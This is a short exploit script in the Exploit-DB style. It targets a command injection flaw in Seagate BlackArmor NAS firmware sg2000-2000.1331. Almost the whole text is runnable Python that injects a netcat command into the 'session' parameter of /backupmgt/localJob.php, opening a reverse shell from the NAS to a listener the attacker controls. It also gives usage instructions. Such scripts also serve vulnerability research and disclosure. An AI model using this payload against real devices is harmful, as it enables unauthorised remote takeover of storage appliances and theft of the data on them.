# Exploit Title: Seagate BlackArmor NAS sg2000-2000.1331 - Command Injection # Date: 15.07.2021 # Discovered by: Jeroen - IT Nerdbox # Exploit Author: Metin Yunus Kandemir # Version: sg2000-2000.1331 # Vendor Homepage: https://www.seagate.com/ # Software Link: https://www.seagate.com/tr/tr/support/downloads/item/banas-220-firmware-master-dl/ #!/usr/bin/python3 import requests import sys def exec(target, ncIp, ncPort): print("[!] Please check netcat listener: "+ ncPort) url = "http://" + target + "/backupmgt/localJob.php?session=fail;nc+"+ncIp+"+"+ncPort+"+-e+/bin/sh%00" r = requests.get(url = url) sys.exit(1) def main(args): if len(args) != 4: print("[*] usage: %s targetIp:port ncIp ncPort" % (args[0])) print("[*] Example:python3 exploit.py 192.168.1.13 192.168.1.22 80") sys.exit(1) exec(target=args[1], ncIp=args[2], ncPort=args[3]) if __name__ == "__main__": main(args=sys.argv)